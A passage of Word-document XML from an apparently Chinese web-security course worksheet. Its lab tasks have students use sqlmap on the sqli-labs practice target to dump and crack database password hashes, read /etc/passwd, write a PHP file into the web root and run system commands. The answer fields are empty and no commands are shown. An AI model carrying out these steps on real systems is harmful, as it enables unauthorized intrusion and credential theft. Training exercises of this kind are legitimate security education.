          <w:p w14:paraId="059C3512" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:num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lastRenderedPageBreak/>
              <w:t>通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取数据库所有用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3515" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3514" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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lastRenderedPageBreak/>
              <w:t>实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C351C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3516" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3517" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3518" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3519" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C351A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C351B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C351D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C351E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc18506"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取并破解数据库密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3520" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C351F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3522" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3521" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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获取并破解数据库密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3524" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3523" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3526" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3525" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取并破解数据库密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3528" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3527" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C352B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3529" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C352A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取数据库所有用户的密码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>，并破解</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户的明文密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C352D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C352C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3534" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C352E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C352F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3530" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3531" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3532" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3533" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3535" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3536" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc21228"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取系统文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3538" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3537" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C353A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3539" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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读取系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C353C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C353B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C353E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C353D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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lastRenderedPageBreak/>
              <w:t>学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>读取系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3540" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C353F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3543" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3541" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3542" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>读取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3545" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3544" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C354C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3546" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3547" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3548" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3549" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C354A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C354B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C354D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C354E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc28425"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入系统文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3550" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C354F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3552" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3551" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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写入系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3554" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3553" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3556" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3555" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>写入系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3558" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3557" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C355D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3559" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C355A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:num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编写一个</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>文件，该文件返回</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>phpinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>的信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C355B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>，往目标系统的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/var/www/html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>目录写入该</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C355C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:num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通过浏览器访问该上传的文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C355F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C355E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3566" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3560" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3561" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3562" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3563" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3564" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3565" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3567" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3568" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc8282"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>执行系统命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C356A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3569" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C356C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C356B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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执行系统命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C356E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C356D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3570" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C356F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
